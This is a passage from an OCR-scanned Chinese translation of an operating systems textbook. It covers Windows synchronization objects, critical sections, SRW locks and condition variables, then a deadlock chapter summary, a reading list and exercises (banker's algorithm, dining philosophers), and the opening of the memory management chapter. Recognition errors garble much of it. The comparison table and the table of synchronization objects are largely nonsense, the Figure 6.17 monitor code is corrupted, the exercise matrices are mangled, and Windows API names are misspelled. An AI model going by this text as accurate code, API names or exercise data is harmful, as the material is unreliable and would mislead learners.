条 件 不 满足 , 那么 调用 的 线程 就 会 进入 等 待 状态 。 在 等 待 条 件 满足 期 间 , 它 不 会 占用 处 理 器 时 间 。 

最 直接 的 等 待 函数 类 型 是 等 待 单个 对 象 的 函数 。 函 数 WaitForsingleobject 要 求 一 个 同 
步 对 象 的 句柄 。 当 下 列 条 件 之 一 满足 时 ， 函 数 就 会 返回 : 

© 特定 的 对 象 处 于 有 信号 状态 。 

@ 发 生 了 超时 ， 超 时 间隔 可 以 设置 为 INFINITE 来 指定 等 待 不 会 超时 。 





6.10.2 ”分派 器 对 象 


Windows 执行 体 实 现 同步 的 机 制 是 同步 对 象 族 ， 表 6.7 给 出 了 同步 对 象 族 的 简单 描述 。 

表 中 开始 的 5 项 对 象 类 型 主要 用 来 支持 同步 , 而 其 他 对 象 类 型 有 其 他 用 途 , 但 也 可 以 用 于 同步 。 

每 个 分 派 器 对 象 实例 既 可 以 处 于 有 信号 状态 , 也 可 以 处 于 无 信号 状态 9。 线程 可 以 阻塞 在 一 
个 处 于 无 信和 号 状态 的 对 象 上 ， 当 对 象 进 入 有 信号 状态 时 线程 就 会 被 释放 。 这 种 机 制 非常 简洁 。 线 
程 使 用 同步 对 象 句柄 发 出 一 个 等 待 请 求 给 Windows 执行 体 。 当 对 象 进入 到 有 信号 状态 时 ， 
Windows 执行 体 释 放 一 个 或 全 部 的 等 待 在 该 分 派 器 对 象 上 的 线程 对 象 。 


Windows/Linux 比较 


Windows Linux 
常用 同步 原 语 ， 例 如 信和 号 量 对 象 、 互 斥 对 象 ARR E 常用 同步 原 语 ， 如 信和 号 量 对 象 、 互 斥 对 象 、 自 旋 锁 、 
时 器 ， 基 于 底层 的 wait/signal 机 制 定时 器 、 基 于 底层 sleep/wakeup 机 制 


很 多 内 核对 象 也 是 分 派 器 对 象 , 这 意味 着 线程 可 以 通过 在 
用 户 态 下 使 用 通用 事件 机 制 与 其 同步 。 进 程 和 线程 的 终止 是 


事件 ，LO 完成 也 是 一 个 事件 





进程 可 以 利用 select) 系统 调用 等 待 TO, 可 以 最 多 


同时 等 入 多 个 ， 
线程 可 以 同时 等 待 多 个 分 派 器 对 象 使 用 64 个 文件 描述 符 
支持 用 户 态 读 / 写 锁 和 条 件 变量 支持 用 户 态 读 / 写 锁 和 条 件 变 量 
4 A ， 了 于 递增/ 、 
支持 很 多 硬件 原子 操作 , 例如 原子 递增 /递减 、 比 较 并 交换 won TIM PURE BR 


利用 比较 并 交换 支持 非 锁定 原子 LIFO 队列 , 称 为 SLIST， 
广泛 用 在 操作 系统 中 并 且 也 可 用 于 用 户 程序 

内 核 中 存在 各 种 同步 机 制 以 提高 可 扩展 性 , 很 多 是 基于 简 
单 的 比较 并 交换 机 制 ， 例 如 push-locks 和 对 象 的 快速 引用 

命名 管道 和 套 接 字 支 持 远程 过 程 调用 ( RPC ) ， 像 本 地 
系统 中 使 用 的 高 效 局 部 过 程 调用 ( ALPC ) 机 制 一 样 。ALPC 命名 管道 和 套 接 字 支持 远程 过 程 调用 (RPC) 
大 量 用 于 客户 程序 和 本 地 服务 之 间 的 通信 

异步 过 程 调用 (APC) 大 量 用 于 内 核 中 ， 以 使 线程 作用 
于 其 自身 (比如 终止 和 IO 结束 会 使 用 APC， 因 为 这 些 操 
作 在 一 个 线程 的 上 下 文中 更 容易 实现 , 而 不 是 跨 线 程 实现 ) 。 
APC 还 可 以 用 于 用 户 态 ,但 用 户 态 APC 只 在 用 户 态 线程 在 
内 核 中 阻塞 时 提供 

硬件 支持 将 中 断 处 理 过 程 进行 延迟 ， 直 到 中 断 级 别 
( interrupt level ) 降低 。Windows 中 这 一 功能 是 由 延迟 过 程 调 使 用 tasklets 延迟 中 断 处 理 ， 直 到 中 断 优 先 级 降低 
用 ( Deferred Procedure Call, DPC) 控制 对 象 提 供 的 


事件 对 象 用 于 发 送 一 个 信号 给 线程 ， 表 示 一 个 特定 事件 已 发 生 。 例 如 在 交替 的 输入 输出 中 ， 
当 交 替 操作 完成 后 , 系统 将 一 个 特定 的 时 间 对 象 设置 为 有 信和 号 状态 来 表示 操作 的 完成 。 互 斥 对 象 
用 来 确保 对 资源 的 互 斥 访问 , 同一 时 间 只 允许 一 个 线程 对 象 获得 访问 权 。 因 而 互 斥 对 象 功能 上 和 
二 元 信和 号 量 相像 。 当 互 斥 对 象 进 入 到 有 信号 状态 时 , 仅仅 只 有 一 个 在 互 斥 和 信号 上 等 待 的 线程 能 触 
发 。 互 斥 用 于 对 运行 在 不 同 进程 中 的 线程 进行 同步 。 和 互 斥 量 相似 ,信号 量 对 象 可 以 在 多 个 进程 
中 被 线程 共享 。Windows 信号 量 是 一 个 计数 信号 量 。 在 本 质 上 , 可 等 待 的 计时 器 对 象 会 在 适当 的 
时 间或 者 间隔 产生 信号 。 





UNIX 支持 用 于 进程 间 通 信 的 通用 信号 机 制 。 信 号 
模型 是 建立 在 硬件 中 断 之 上 的 ， 它 可 以 在 任意 时 间 发 
出 ， 而 不 会 被 接受 进程 阻塞 。 与 硬件 中 断 类 似 ， 信 号 
语义 在 多 线程 中 非常 复杂 





O 也 可 称 为 等 待 信号 状态 。 一 一 译 者 注 
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3% 6.7 Windows 的 同步 对 得 


对 象 类 型 对 正在 等 待 的 线程 的 影响 
| RET ae | ee 全 部 释放 
同步 事件 | ”发生 了 一 个 系统 事件 的 通告 线程 设置 该 事件 释放 一 个 线程 


提供 互 斥 能 力 的 机 制 ; 等同 于 二 | ”拥有 者 线程 或 其 他 线程 | 
释放 互 斥 量 rbd 











元 信号 量 


用 于 管理 可 以 使 用 一 不 资源 的 研 
信号 量 ae | (ey Sk eae | 全 部 释放 
可 等 待 的 计时 器 记录 时 间 眉 的 计时 器 To lg aie ami 


一 个 打开 的 文件 或 者 IIO 设备 的 
文件 Sa ERA ET 全 部 释放 


一 个 程序 调用 ， 包 括 运行 该 程序 





县 后 一 个 线程 终 部 
mix 所 需要 的 地 址 空间 和 资源 MERRE DNA 
线程 进程 中 的 一 个 可 执行 的 实体 全 部 释放 

注 : 灰色 部 分 表示 的 行 对 应 于 同步 对 象 。 | 

6.10.3 ”临界 区 


临界 区 提供 了 与 互 斥 对 象 类 似 的 同步 机 制 ， 不 同 的 是 ， 临 界 区 只 能 用 在 单个 进程 的 线程 中 。 
事件 对 象 、 互 斥 对 象 和 信和 号 量 对 象 也 能 够 用 于 单个 进程 的 应 用 程序 中 , 但 是 临界 区 对 互 乐 同步 提 
供 了 更 快 、 更 高 效 的 机 制 。 

进程 负责 分 配 临 界 区 使 用 的 内 存 区 域 。 一 般 来 说 ， 这 可 以 通过 声明 类 型 为 CRITICAL 
SECTION 的 变量 来 完成 ; 在 进程 中 的 线程 使 用 它 之 前 ， 使 用 Initializecriticalsection 
或 InitializeCriticalSectionAndSpincount 函数 来 初始 化 临界 区 。 

线程 使 用 EnterCriticalSection MR TryEnterCriticalSection 函数 来 请 求 拥有 该 
临界 区 ,使 用 LeaveCriticalsection 函数 来 释放 临界 区 的 拥有 权 。 如 果 临 界 区 目前 被 其 他 
进程 拥有 ， 那 么 Entercriticalsection 将 无 限期 地 等 待 拥 有 权 。 相 比 之 下 ， 当 互 斥 对 象 用 
在 互 斥 中 时 , 等 待 函 数 接收 一 个 超时 间隔 。TryEnterCriticalSsSection 函数 试图 进入 临界 区 
而 不 会 阻塞 调用 线程 。 

临界 区 使 用 一 个 复杂 精巧 的 算法 来 获取 互 斥 量 。 如 果 是 多 处 理 器 系统 , 其 代码 将 会 试图 获取 

一 个 自 旋 锁 。 在 程序 持 有 临界 区 的 时 间 很 短 的 情况 下 , 这 种 方式 能 够 很 好 地 工作 。 并 且 自 旋 锁 有 

效 地 优化 了 当前 拥有 临界 区 的 线程 在 其 他 处 理 器 上 运行 的 情况 。 如 果 在 一 个 合适 的 循环 次 数 之 后 
仍 不 能 获得 自 旋 锁 ,系统 将 使 用 一 个 分 派 器 对 象 阻塞 该 线程 , 这 样 内 核 可 以 将 其 他 线程 调度 到 处 
理 器 运行 。 分 派 器 对 象 仅 作为 万 不 得 已 的 时 候 的 手段 使 用 。 为 了 保证 正确 性 ， 临 界 区 是 必需 的 ; 
但 是 实际 上 很 少 发 生 对 临界 区 的 竞争 。 通 过 对 分 派 器 对 象 进 行 延迟 分 配 (lazily allocating )， 系 统 
节省 了 可 观 的 内 核 虚 拟 内 存 。 


6.10.4 轻 量 级 读 写 锁 和 条 件 变量 


Windows Vista 中 增加 了 用 户 态 的 读 写 锁 。 与 临界 区 一 样 ， 仅 当 试 图 使 用 自 旋 锁 时 ， 读 写 锁 
进入 内 核 进 行 阻塞 。 之 所 以 称 为 轻 量 级 ， 是 由 于 该 读 写 锁 通 常 只 需要 一 个 指针 大 小 的 内 存 空 间 。 
使 用 SRW 时 ， 进 程 要 声明 一 个 SRWLOCK 类 型 的 变量 ， 并 调用 InitializesRwiock 对 
其 初始 化 。 线 程 通过 调用 AcquiresRWLockExclusive 或 AcquireSRWLockShared 可 获得 
SKW 锁 ， 通 过 调用 ReleaseSRWLockExclusive 或 ReleaseSRWLockShared 可 释放 该 锁 。 
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Windows Vista 中 也 增加 了 条 件 变量 。 进 程 必须 声明 一 个 CONDITION_VARIABLE 类 型 的 变量 ， 
并 在 某 个 线程 中 调用 InitializeConditionVariable 进行 初始 化 。 条 件 变 量 可 用 于 临界 区 或 
SRW 锁 , 因而 有 两 种 方法 ,8SLeepconaitionVariablecs Ñl SleepConditionVariableSRW. 
它们 在 特定 的 条 件 下 睡眠 并 按照 原子 操作 方式 释放 特定 的 锁 。 

有 两 种 唤醒 方法 ，WakeConditionVariable 和 WakeAllconditionvVariable, 它们 
分 别 唤醒 一 个 或 所 有 睡 眼 的 线程 。 条 件 变 量 的 用 法 如 下 : 

1) 获得 互 斥 锁 ; 

2) 当 predicate() 为 .FALSE 时 ， 调 用 SleepConditionVariable() ; 

3) 执行 受 保 护 的 操作 ; 

4) 释放 该 锁 。 


6.11 小结 


死 锁 是 指 一 组 争 用 系统 资源 或 互相 通信 的 进程 被 阻塞 的 现象 , 阻塞 是 永久 的 , 除非 操作 系统 
采取 某 些 非常 的 行动 ， 如 杀 死 一 个 或 多 个 进程 , 或 者 强迫 一 个 或 多 个 进程 进行 回 滚 。 死 锁 可 能 涉 
及 可 重用 资源 或 可 消耗 资源 。 可 重用 资源 是 指 不 会 因为 使 用 而 被 耗 尽 或 销毁 的 资源 ,如 LO 通道 
或 一 块 内 存 区 域 。 可 消耗 资源 是 指 当 被 一 个 进程 获得 时 就 销毁 了 的 资源 , 这 类 资源 的 例子 有 消息 
和 LO 缓冲 区 中 的 信息 。 

处 理 死 锁 通 常 有 三 种 方法 : 预防 、 检 测 和 避免 。 死 锁 预 防 通 过 确保 死 锁 的 一 个 必要 条 件 不 会 
满足 ， 保 证 不 会 发 生死 锁 。 如 果 操 作 系统 总 是 同意 资源 请 求 ， 则 需要 死 锁 检 测 。 操 作 系 统 必 须 周 
期 性 地 检查 死 锁 ,并 采取 行动 打破 死 锁 。 死 锁 避 免 涉 及 分 析 新 的 资源 请 求 ， 以 确定 它 是 否 会 导致 
死 锁 ， 并 且 只 有 当 不 可 能 死 锁 时 才 同 意 该 请 求 。 


6.12 推荐 读物 


[HOLT72] 和 [COFF71] 是 关于 死 锁 的 经 典 文章 ， 值 得 一 读 ; fISLO80] 是 一 个 很 好 的 概论 ; [CORB96] 是 
对 死 锁 检 测 的 全 面 论述 ; [DIMI98] 是 关于 死 锁 的 很 好 综述 。Levine 的 两 篇 最 近 的 文章 [LEVI03a，LEVI03b] 
阐明 了 在 死 锁 中 讨论 的 一 些 概 念 。[SHUB03] 是 对 死 锁 的 全 面 综述 。[ABRA06] 描 述 了 一 个 死 锁 检测 包 。 
UNIX SVR4、Linux 和 Solaris 2 中 的 并 发 机 制 分 别 包含 在 [GRAY97]、[LOVE05] 和 [MCDO07] 中 。 
ABRA06 Abramson,T.“Detecting Potential Deadlocks.”Dr.Dobb's Journal,January 2006. 
COFF71 Coffman,E.;Elphick,M.,;and Shoshani,A.“System Deadlocks.” Computing Surveys,June 1971. 
CORB96 Corbett,J.“Evaluating Deadlock Detection Methods for Concurrent Software.” IEEE Transactions on 
Software Engineering,March 1996. 

DIMI98 Dimitoglou,G.“Deadlocks and Methods for Their Detection,Prevention,and Recovery in Modern 
Operating Systems.” Operating Systems Review,July 1998. 

GRAY97 Gray,J.Interprocess Communications in UNIX:The Nooks and Crannies.Upper Saddle River,NJ: 
Prentice Hall,1997. 

HOLT72 Holt,R.“Some Deadlock Properties of Computer Systems.” Computing Surveys,September 1972. 

ISLO80 Isloor,S.,and Marsland,T.“The Deadlock Problem:An Overview.”Computer,September 1980. 

LEVI03a Levine,G.“Defining Deadlock.” Operating Systems Review,January 2003. 

LEVI03b Levine,G.“Defining Deadlock with Fungible Resources.” Operating Systems Review,July 2003. 

LOVES Love,R.Linux Kernel Development. Indianapolis,IN:Novell Press,2005. 

MCDO07 McDougall,R.,and Mauro,J.Solaris Internals:Solaris 10 and OpenSolaris Kernel Architecture. 

Palo Alto,CA:Sun Microsystems Press,2007. 
SHUB03 Shub,C.“A Unified Treatment of Deadlock.” Journal of Computing in Small Colleges,October 
2003. Available through the ACM digital library. 
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6.13 ”关键 术语 、 复 习题 和 习题 


关键 术语 
银行 家 算法 死 锁 预 防 管道 循环 等 竺 
占有 且 等 竺 抢占 可 消耗 资源 联合 进程 图 
资源 分 配 图 死 锁 内 存 屏障 可 重用 资源 
死 锁 避 免 消息 自 旋 锁 死 锁 检 测 
TJ mR 

复习 题 


6.1 给 出 可 重用 资源 和 可 消耗 资源 的 例子 。 
6.2 产生 死 锁 的 三 个 必要 条 件 是 什么 ? 
6.3 产生 死 锁 的 4 个 条 件 是 什么 ? 
6.4 如何 防止 占有 且 等 待 条 件 ? 
6.5 给 出 防止 不 可 抢占 条 件 的 两 种 方法 。 
6.6 如何 防止 循环 等 待 条 件 ? 
6.7 ”和 死 锁 避 免 、 检 测 和 预防 之 间 的 区 别 是 什么 ? 
习题 
6.1 列举 出 死 锁 发 生 的 必要 条 件 ， 请 给 出 一 个 简洁 的 例子 或 者 理由 ,来 说 明 破坏 每 个 条 件 的 策略 有 哪些 不 
ZA. 
6.2 ”根据 图 6.1， 写 出 可 以 用 于 本 图 的 预防 、 避 兔 和 检测 技术 ， 
6.3 BEAR 6.1 节 中 对 图 6.2 中 路 径 的 描述 ， 给 出 对 图 6.3 中 6 种 路 径 的 简单 描述 。 
64 在 6.1 节 定义 了 资源 分 配 图 ， 图 6.5 给 出 了 一 个 例子 。 
a) 列举 死 锁 产 生 的 四 个 必要 条 件 。 
b) 描述 一 个 可 重用 资源 的 例子 : 死 锁 的 必要 条 件 都 发 生 了 ， 但 是 不 存在 死 锁 。 画 出 相应 的 资源 分 配 
图 。( 注意 : 如 果 一 个 进程 有 一 条 申请 边 ， 那么 这 个 进程 一 定 是 在 等 待 这 个 资源 。 也 就 是 说 ， 这 个 
资源 不 是 空闲 的 。) 
6.5 考虑 按照 下 面 代码 创建 的 四 个 线程 (TI1,, T2，T3， 和 T4 )。 
注意 : 我 们 不 知道 进程 在 两 个 信号 量 操作 之 间 会 花 多 少时 间 来 执行 代码 。 
program Concurrent Threads; 
var 
sl: semaphore(:1); 
s2: semaphore(:2) ; 
s3: semaphore(:3); 
s4: semaphore(:4); 
s5: semaphore(;:5); 
s6: semaphore(:6); 
procedureT1 (); 
begin . 
{..P(s1) ..P(s2) ..P(s3) ..V(s1) ..V(s3) ..v(s2)}; x 
end; 
procedureT2 (); 
begin 
{..P(s2) ..P(s4) ..P(s5) ..V(s2) ..V(s4) --V(s5)}; 
end; 
procedureT3(); 
begin 
{..P(s5) ..P(s6) ..P(sl) ..V(s6) --V(sl) ..V(s85)}; 
end; 
procedureT4 () ; 
begin 
{..P(s5) ..P(s1) ..v(s1) --P(s3) ..V(s5) ..V(s3)}; 
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6.6 


6.7 


end; 
begin(* main program *) 
parbegin 
T1(); 
T2(); 
T3(); 
T4(); 
parend 
end. 


a) 给 出 一 个 进入 死 锁 状 态 的 实例 ， 画 出 它 的 资源 分 配 图 。( 6.1 小 节 定 义 了 资源 分 配 图 ， 图 6.5 给 出 了 
一 个 例子 。) 

b) 上 述 代 码 会 出 现 死 锁 吗 ? 请 给 出 理由 。 
请 把 6.4 节 中 的 死 锁 检测 算法 应 用 于 下 面 的 数据 ， 并 给 出 结果 。 

Available= (2 1 0 0) 
2 00 1 0010 
1010 2001 
2100 0 1 2 0 
一 个 假 脱 机 系统 ( 如 图 6.16 AR) 包含 一 个 输入 进程 I、 用 户 进 程 P 和 一 个 输出 进程 0, 它们 之 间 用 
两 个 缓冲 区 连接 。 进 程 以 相等 大 小 的 块 为 单位 交换 数据 ,这些 块 利用 输入 缓冲 区 和 输出 缓冲 区 之 间 的 
移动 边界 缓存 在 磁盘 上 ， 并 取决 于 进程 的 速度 。 所 使 用 的 通信 原 语 确 保 满 足下 面 的 资源 约束 : 


i+o < max 


Request = Allocation = 














其 中 ，max 表示 磁盘 中 的 最 大 块 数 ，i 表示 磁盘 中 的 输入 块 数目 ，o 表示 磁盘 中 的 输出 块 数目 。 


6.8 


6.9 


缓冲 区 i 缓冲 区 


图 6.16 一 种 假 脱 机 系统 





以 下 是 关于 进程 的 知识 : 

1) 只 要 环境 提供 数据 ， 进 程 1 最终 把 它 输 入 到 磁盘 上 只 要 磁极 空间 可 用 )。 

2) 只 要 磁盘 可 以 得 到 输入 ， 进 程 P 最 终 消 耗 掉 它 ， 并 在 磁盘 上 为 每 个 输入 块 输出 有 限量 的 数据 〈 只 
要 磁盘 空间 可 用 )。 

3) 只 要 磁盘 可 以 得 到 输出 ， 进 程 0 最 终 消 耗 掉 它 。 

说 明 这 个 系统 可 能 死 锁 。 

给 出 在 习题 6.6 中 预防 死 锁 的 附加 资源 约束 ， 仍 然 允许 输入 和 输出 缓冲 区 之 间 的 边界 可 以 根据 进程 现 

在 的 要 求 变 化 。 

在 THE 多 道 程序 设计 系统 [DIJK68] 中 , 一 个 磁 鼓 (磁盘 的 先驱 ， 用 做 外 存 ) 被 划分 成 输入 缓冲 区 、 处 

理 区 和 输出 缓冲 区 ， 它 们 的 边界 可 以 移动 ， 这 取决 于 所 涉及 的 进程 速度 。 磁 鼓 的 当前 状态 可 以 用 以 下 

参数 描述 : 

max 表示 磁 鼓 中 的 最 大 页 数 

i 表示 磁 鼓 中 的 输入 页 数 

p 表示 磁 鼓 中 的 处 理 页 数 

o 表示 磁 鼓 中 的 输出 页 数 , 

reso 表示 为 输出 保留 的 最 小 页 数 

resp 表示 为 处 理 保留 的 最 小 页 数 

为 保证 不 会 超出 磁 鼓 的 容量 ， 并 且 为 输出 和 处 理 永远 保留 最 小 的 页 数 , 请 给 出 所 需要 资源 约束 的 公式 。 


6.10 在 THE 多 道 程序 设计 系统 中 ， 一 页 可 以 进行 下 列 状态 转换 : 


1 ) 空 一 输入 缓冲 区 (输入 生产 ) 
2) 输入 缓冲 区 一 处 理 区 域 (输入 消耗 ) 
3 ) 处 理 区 域 一 输出 缓冲 区 (输出 生产 ) 
4) 输出 缓冲 区 一 空 (输出 消耗 ) 


5) 空 一 处 理 区 域 ( 过程 调用 ) 
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6.11 


6.12 


6.13 


6.15 


6.16 


6) 处 理 区 域 一 空 (过程 返回 ) 
a) 根据 i、o 和 的 量 定义 这 些 转换 的 结果 。 
b) 如 果 维 持 习 题 6.6 中 关于 输入 进程 、 用 户 进程 和 输出 进程 的 假设 ， 它 们 中 是 否 存在 一 个 转换 会 导 
致死 锁 ? 
假设 在 系统 中 有 四 个 进程 和 四 种 类 型 的 资源 ， 系 统 使 用 银行 家 算法 来 避免 死 锁 。 最 大 资源 需求 矩阵 是 
4 4 2 1 
4 3 1 1 
13 52 7 
6 1 1 1 
其 中 Claim, (1<i<4Hl< j<4) 表示 进程 上 对 于 资源 /的 最 大 需求 。 系 统 中 每 一 种 类 型 的 资源 总 量 
由 向 量 [16,5,2,8] 给 出 。 当 前 的 资源 分 配 情 况 由 下 面 的 矩阵 给 出 : 
4001 
12 1 0 
10 2 
3 1 1 0 
其 中 ，Allocationy 表示 当前 分 配给 进程 i 的 资源 j 的 数量 。 
a) 说 明 这 个 状态 是 安全 的 。 
b) 说 明 进 程 1 申请 1 个 单位 的 资源 2 是 否 允 许 。 
c) 说 明 进 程 3 申请 6 个 单位 的 资源 1 是 否 允 许 。( 这 个 问题 和 问题 b 是 独立 的 ) 
d) 说 明 进 程 2 申请 2 个 单位 的 资源 4 是 否 允 许 。( 这 个 问题 和 问题 b、c 是 独立 的 ) 
你 是 否 同 意 或 不 同意 下 面 的 陈述 ， 如 果 一 个 资源 由 于 崩溃 无 法 使 用 了 ， 银 行家 算法 可 能 会 无 法 避免 
死 锁 。 证 明 你 的 观点 。 
有 一 个 已 经 实现 了 的 管道 算法 ,使 得 进程 Po 产生 的 T 类 型 的 数据 元 素 流 经 进程 序列 P, Po, Pras 
并 且 按 该 顺序 在 元 素 上 操作 。 
a) 定义 一 个 一 般 的 消息 缓冲 区 ， 包 含 所 有 部 分 消耗 的 数据 元 素 ， 并 按 下 面 的 格式 为 进程 P ( 0<i< 
n-1) 写 一 个 算法 。 
repeat 
从 前 驱 接收 
消耗 
给 后 续 发 送 
forever 
假设 Po 收 到 Pri 发 送 的 输入 元 素 。 该 算法 能 够 使 进程 直接 在 缓冲 区 中 保存 的 消息 上 操作 ， 而 无 
需 复 制 。 
b) 说 明 进 程 不 会 死 锁 ( 考虑 公共 缓冲 区 )。 
a) 3 个 进程 共享 4 个 资源 单元 ,一 次 只 能 保留 或 释放 一 个 单元 。 每 个 进程 最 大 需要 2 个 单元 。 说 明 
不 会 发 生死 锁 。 
b) N 个 进程 共享 M 个 资源 单元 , 一 次 只 能 保留 或 释放 一 个 单元 。 每 个 进程 最 大 需要 单元 数 不 超 过 
M， 并 有 旦 所 有 最 大 需求 的 总 和 小 于 M+N。 说 明 不 会 发 生死 锁 。 
考虑 下 面 三 个 并 发 进程 以 及 资源 需求 : 
进程 P0 只 需要 资源 R1 和 R3 
进程 Pl 只 需要 资源 R2 和 R3 
进程 P2 只 需要 资源 R1 和 R3 
a) 对 于 上 面 的 资源 需求 ， 给 出 一 个 会 导致 死 锁 的 分 配 顺序 。 
b) 通 出 上 面 描述 的 分 配 序列 的 资源 分 配 图 。( 6.1 小 节 定 义 了 资源 分 配 图 ， 图 6.5 给 出 了 一 个 例子 。) 
考虑 下 列 处 理 死 锁 的 方法 : 1) 银行 家 算法 ，2 ) 死 锁 检 测 并 杀 死 线程 ， 释放 所 有 资源 ，3 ) 事先 保留 所 有 
资源 ，4 ) 如 果 线 程 需要 等 待 , 则 重新 启动 线程 并 释放 所 有 资源 ，5 ) 资源 排序 ，6 ) 检测 死 锁 并 回 滚 线程 。 
a) 评价 解决 死 锁 的 不 同方 法 使 用 的 一 个 标准 是 ， 哪 种 方法 允许 最 大 的 并 发 。 换 言 之 ， 在 没有 死 锁 时 ， 
哪 种 方法 允许 最 多 数目 的 线程 无 需 等 待 继续 前 进 ? 对 上 面 列 出 的 6 种 处 理 死 锁 的 方法 ， 给 出 从 1 
到 6 的 一 个 排序 ( 1 表示 最 大 程序 的 并 发 )， 并 解释 你 的 排序 。 
b) 另 一 个 标准 是 效率 ; 换言之 ， 哪 种 方法 需要 最 小 的 处 理 器 开销 ?假设 死 锁 很 少 发 生 ， 给 出 各 种 方 
法 从 1 到 6 的 一 个 排序 ( 1 表示 最 有 效 ), 并 解释 这 样 排序 的 原因 。 如 果 死 锁 发 生 很 频繁 ,你 的 顺 


Claim = 


Allocation = 
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序 需 要 改变 吗 ? 
6.17 评价 下 面 给 出 的 哲学 家 就 餐 问 题 的 解决 方案 。 一 位 饥 铁 的 哲学 家 首先 拿 起 他 左边 的 叉子 ， 如 果 他 右 
边 的 叉子 也 是 可 用 的 ， 则 拿 起 右边 的 叉子 开始 吃饭 ， 和 否则 他 放下 左边 的 叉子 ， 并 重复 这 个 循环 。 
6.18 假设 有 两 种 类 型 的 哲学 家 。 一 类 总 是 先 拿 起 左边 的 叉子 ( AMT), 另 一 类 总 是 先 拿 起 右边 的 叉子 ( 右 
撤 子 )。 左 撤 子 的 行为 和 图 6.12 中 定义 的 一 致 。 右 撤 子 的 行为 如 下 : 


begin 
repeat 
think; 
wait { fork[ (i+l) mod 5] ); 
wait ( fork{iJ); 
eat; 
signal ( fork[i] ); 
signal ( forkl (i+l) mod 51 ); 
forever 
end; 
证 明 : 


a) 如 果 至 少 有 一 个 左 撤 子 和 一 个 右 撤 子 ， 则 他 们 的 任何 就 座 安排 都 可 以 避免 死 锁 。 
b) 如 果 至 少 有 一 个 左 撤 子 或 右 撤 子 ， 则 他 们 的 任何 就 座 安排 都 可 以 防止 饥饿 。 
6.19 图 6.17 显示 了 另外 一 个 使 用 管 程 解决 哲学 家 就 餐 问题 的 方法 。 和 图 6.14 比较 并 阐述 你 的 结论 。 


monitor dining controller; 
enum states (thinking, hungry, eating} state[5]; 
cond needPork[5] /* condition variable */ 


void get_forks(int pid) /* pid ix the philosopher id number */ 


eatate[pid] = hungry; /* announce that I'm hungry */ 
if (statel (pidt+1) $ 5] == eating | | reatet piai) % 5] == eating) 

vott peedrorkIpid]); wait if either neighbor is eating */ 
state{pid} = eating fe proceed if neither neighbor is eating */ 


void release_forke(int pid) 
{ 
state[pidj) = thinking; 
/* give right (higher) neighbor a chance to eat */ 
if (statef (pid+1) t 5} == hungry) sk ieeatel pidr) 多 5)) Ja eating) 
esignal (needFork[ pid+l)); 
/* give left (lower) neighbor a chance to eat */ 
else if (state{(pid—1) % 5) == hungry) && Catara (pid-2} % 5]) t= eating) 
caignal (needPork[pid—1]); 
} 


void philosopher[k=0 to 4] /* the five philosopher clients */ 


{ 
while (true) { 
<think>; 
get_forks(k); /* client requests two forks via monitor */ 
<eat spaghetti>; 
release_forks(k); /* client releases forks via the monitor */ 
} 
} 





图 6.17 哲学 家 就 餐 问 题 的 一 种 方案 〈 使 用 管 程 ) 


6.20 在 表 6.3 中 , Linux 的 一 些 原 子 操作 不 会 涉及 对 同一 变量 的 两 次 访问 。 如 atomic_read( atomic_t 
*v)。 简 单 的 读 操作 在 任何 体系 结构 中 都 是 原子 的 。 为 什么 该 操作 增加 到 了 原子 操作 的 指令 表 中 ? 
6.21 考虑 Linux 系统 中 的 如 下 代码 片断 : 
read_lock ( &mr_rwlock); 
write_lock ( &mr_rwlock); 
其 中 mr_rwlock 是 读者 写 者 锁 。 这 段 代 码 的 作用 是 什么 ? 
6.22 ”两 个 变量 a Alb 分 别 有 初 始 值 1 和 2。 对 于 Linux 系统 有 如 下 代码 : 





线程 1 线 程 2 
a = 3; 一 
mb ( ); 一 
bed; c= b, 
一 rmb ( ); 
一 d = a;. 


使 用 内 存 屏 障 是 为 了 避免 什么 错误 ? 





内 存 管理 是 操作 系统 设计 中 最 困难 的 方面 之 一 。 虽 然 内 存 的 成 本 已 大 幅 下 降 , 使 得 现代 计算 
机 中 内 存 的 客 量 已 经 达到 了 GB 量 级 ,但 是 依然 没有 足够 的 内 存 来 容纳 活跃 进程 和 操作 系统 需要 
的 所 有 程序 代码 和 数据 结构 。 因 此 ,操作 系统 的 一 个 首要 的 任务 就 是 管理 内 在， 包括 从 外 存 装 载 
数据 块 和 换 出 数据 块 到 外 存 。 然 而 ， 内 存 IO 是 一 个 很 慢 的 操作 ,其 速度 相对 于 处 理 器 指令 周期 
时 间 来 说 差距 越 来 越 大 。 为 了 保持 处 理 器 处 于 繁 收 状 态 从 而 维持 效率 , 操作 系统 必须 巧妙 地 选择 
换 入 换 出 数据 的 时 机 以 最 小 化 内 存 1/0 对 性 能 的 影响 。 


第 三 部 分 导读 


第 7 章 : 内 存 管理 


第 7 章 概述 了 内 存 管理 的 基本 机 制 。 首 先 ,总结 了 任何 一 个 内 存 管 理 方案 都 需要 满足 的 基本 
需求 。 然 后 ， 介 绍 了 内 存 分 区 的 方法 。 除 了 在 诸如 内 核 存储 管理 等 特殊 情况 下 ， 内 存 分 区 技术 用 
得 并 不 多 。 但 是 通过 回顾 内 存 分 区 技术 ， 可 以 阐明 很 多 内 存 管理 中 的 设计 问题 。 本 章 其 余 的 部 分 
讲述 产生 内 存 管理 系统 中 基本 构造 块 的 两 种 技术 : 分 页 和 分 段 。 


第 8 章 : 虚拟 内 存 


基于 分 页 技术 或 者 分 页 和 分 段 技术 的 组 合 的 唐 拟 内 存 , 是 现代 计算 机 中 内 存 管 理 最 常用 的 方 
法 之 一 。 虚拟 内 看 对 应 用 程序 完全 透明 ， 使 得 每 个 进程 在 执行 时 好 像 有 无 限 的 内 存 可 用 。 为 实现 
这 一 点 ,操作 系统 为 每 个 进程 在 磁盘 上 创建 一 块 虚拟 地 址 空间 ， 即 虚拟 内 存 。 在 需要 的 时 候 可 以 
把 部 分 虚拟 内 存 载 入 到 真正 的 内 存 中 。 这样 ， 多 个 进程 便 可 以 共享 相对 比较 小 的 内 存 。 为 了 使 虚 
拟 内 存 更 为 有 效 ， 需 要 硬件 机 制 来 执行 基本 的 分 页 和 分 段 功 能 ， 如 虚拟 地 址 和 实地 址 之 间 的 地 址 
转换 。 第 8 章 首 先 概述 了 这 些 硬 件 机 制 ， 然 后 阅 明 了 与 虚拟 内 存 有 关 的 操作 系统 设计 问题 。 


第 7 章 内 存 管 理 


在 单 道 程序 设计 系统 中 ,内 存 被 划分 成 两 部 分 : 一 部 分 供 操作 系统 使 用 ( 驻 留 监控 程序 、 内 
核 )， 一 部 分 供 当 前 正在 执行 的 程序 使 用 。 在 多 道 程序 设计 系统 中 ,必须 在 内 存 中 进一步 细 分 出 
